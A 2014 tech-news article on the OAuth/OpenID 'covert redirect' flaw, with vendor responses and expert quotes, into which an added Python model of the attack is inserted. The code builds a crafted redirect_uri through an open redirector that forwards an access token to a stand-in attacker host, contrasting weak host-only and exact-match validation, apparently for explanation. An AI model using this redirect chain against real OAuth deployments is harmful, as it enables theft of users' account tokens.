OAuth, OpenID 'covert redirect' flaw discovered; hard to implement fix

updated 11:55 am EDT, Fri May 2, 2014

Google, Microsoft, Facebook all potentially affected by attack vector

With widely deployed security protocols under heightened scrutiny from security researchers after the discovery of Heartbleed, another significant problem has been identified, this time in the open standards OAuth and OpenID used for third-party login and authorization. Both have been found vulnerable to a "covert redirect" flaw, with sites such as Google, PayPal, Yahoo, Facebook, and Microsoft's Hotmail potentially subject to attack.

The flaw works because the authorization request is served from the real provider's domain. A user who clicks a phishing link is shown a genuine login and consent window from the provider being impersonated, such as Facebook, at that provider's actual address, so the usual check of the address bar reveals nothing wrong. The malicious part of the link is its redirect_uri parameter: it points at an open redirector on a legitimate site that uses the provider for login, and the provider accepts it because the address sits on a trusted domain. Once the user authorizes the app, the provider sends the authorization response, an access token or authorization code, to that address, and the open redirector forwards it to the attacker's site instead of the legitimate application. The user's password is never typed into an attacker-controlled page; what leaks is the token that grants access to the user's account data.
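The chain above, modelled end to end, as an added example that is not code from the article, from the researcher, or from any of the providers named. The hostnames, client id, token value and the client's /redirect endpoint are all hypothetical. It contrasts a provider that matches redirect_uri only by host (which lets the crafted request through) with one that requires an exact match against the registered callback (which rejects it), and it reproduces the browser behaviour that carries a URL fragment, and with it an implicit-flow access token, across a 302 to a target that has no fragment of its own.

```python
"""Model of the OAuth 2.0 'covert redirect' chain (constructed example)."""
from typing import Callable, Optional
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

# Hypothetical provider-side registration: one client, one exact callback URI.
REGISTERED_REDIRECTS = {
    "client-abc": {"https://client.example/oauth/callback"},
}
ATTACKER_COLLECTOR = "https://attacker.example/collect"   # hypothetical
SAMPLE_TOKEN = "tok_constructed_0123"                      # stands in for a real bearer token


def host_only_match(client_id: str, redirect_uri: str) -> bool:
    """Weak validation: any https URI on a registered host is accepted.

    Domain-level matching like this is what lets an attacker aim redirect_uri
    at an open redirector that happens to live on the trusted host.
    """
    allowed_hosts = {urlparse(u).netloc for u in REGISTERED_REDIRECTS.get(client_id, ())}
    parsed = urlparse(redirect_uri)
    return parsed.scheme == "https" and parsed.netloc in allowed_hosts


def exact_match(client_id: str, redirect_uri: str) -> bool:
    """Strict validation: byte-for-byte comparison with the registered URI."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())


def build_authorization_url(client_id: str, redirect_uri: str) -> str:
    """The link the phishing message points at. It is on the provider's own
    domain, which is why it looks legitimate to the victim."""
    query = urlencode({"client_id": client_id, "response_type": "token",
                       "redirect_uri": redirect_uri, "state": "xyz"})
    return f"https://provider.example/oauth/authorize?{query}"


def provider_authorize(auth_url: str, validate: Callable[[str, str], bool]) -> Optional[str]:
    """Provider's step after the user has logged in and consented.

    Returns the Location header it would send (implicit flow: the token rides
    in the URL fragment), or None if redirect_uri validation rejects the request.
    """
    q = parse_qs(urlparse(auth_url).query)
    client_id, redirect_uri = q["client_id"][0], q["redirect_uri"][0]
    if not validate(client_id, redirect_uri):
        return None
    fragment = urlencode({"access_token": SAMPLE_TOKEN, "token_type": "bearer",
                          "state": q["state"][0]})
    return urlunparse(urlparse(redirect_uri)._replace(fragment=fragment))


def browser_follow_to_client(location: str) -> str:
    """Browser loads Location on the client site.

    /oauth/callback is the real token endpoint. /redirect?url=... is an open
    redirector that answers 302 to whatever url says; browsers keep the original
    fragment when the redirect target has none, so the token travels with it.
    """
    p = urlparse(location)
    if p.path == "/oauth/callback":
        return location                      # legitimate client receives the token
    if p.path == "/redirect":
        target = parse_qs(p.query).get("url", [""])[0]
        t = urlparse(target)
        return urlunparse(t._replace(fragment=p.fragment)) if t.fragment == "" else target
    return location


def run_chain(validate: Callable[[str, str], bool]) -> Optional[str]:
    """Final URL the authorization response lands on, or None if the provider
    refused the crafted redirect_uri."""
    crafted = "https://client.example/redirect?" + urlencode({"url": ATTACKER_COLLECTOR})
    location = provider_authorize(build_authorization_url("client-abc", crafted), validate)
    return None if location is None else browser_follow_to_client(location)


def token_leaked_to(final_url: Optional[str]) -> Optional[str]:
    """Host that ended up holding the bearer token, if any."""
    if final_url is None:
        return None
    p = urlparse(final_url)
    return p.netloc if "access_token=" in p.fragment else None


if __name__ == "__main__":
    print("host-only validation:", token_leaked_to(run_chain(host_only_match)))
    print("exact validation:    ", token_leaked_to(run_chain(exact_match)))
```

Two things the model makes visible. First, the provider never sees anything suspicious in the host-only case: the login page, the consent screen and the redirect target are all on domains it trusts, so the fix has to be exact redirect_uri matching on the provider side or the removal of open redirectors on every client site. Second, the leak needs no cooperation from the victim beyond approving an app on a page that genuinely belongs to the provider, which is why the usual "check the address bar" advice does not help here.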

Ph.D student Wang Jing of the Nanyang Technological University in Singapore discovered the vector. Wang has reported his findings to Facebook, LinkedIn, and Microsoft, and has received little enthusiasm from any of the companies he's spoken with: LinkedIn plans to publish a blog post on the matter "shortly," but promised no action. Google informed him that the problem was being tracked. Microsoft claimed that they weren't subject to the flaw. Facebook said that they were aware of the problem, "understood the risks associated with OAuth 2.0" and a fix was "something that can't be accomplished in the short term."

PayPal Chief Technology Officer James Barrese told Electronista in a statement that when PayPal implemented OAuth 2.0/OpenID, "we engineered additional security measures to protect our merchants and customers. These measures protect PayPal customers from this specific OAuth 2.0/OpenID vulnerability."

Application security company Veracode's Chief Technology Officer Chris Wysopal told CNet that "given the trust users put in Facebook and other major OAuth providers, I think it will be easy for attackers to trick people into giving some access to their personal information stored on those services."

WhiteHat Security founder Jeremiah Grossman examined Wang's findings. He noted that "I could have sworn I've seen a report of a very similar if not identical vulnerability in OAuth. It would appear this issue is essentially a known 'wontfix.' This is to say, it's not easy to fix, and any effective remedies would negatively impact the user experience." He added that in his view, the problem was "just another example that Web security is fundamentally broken, and the powers that be have little incentive to address the inherent flaws."

by MacNN Staff



Comments

1. Steve Wilkinson (Forum Regular, joined 12-19-01):

    Yep, not only is this whole 'single sign on' thing a bad idea for social engineering reasons (i.e.: phishing training), with an added security flaw, it becomes even more dangerous.
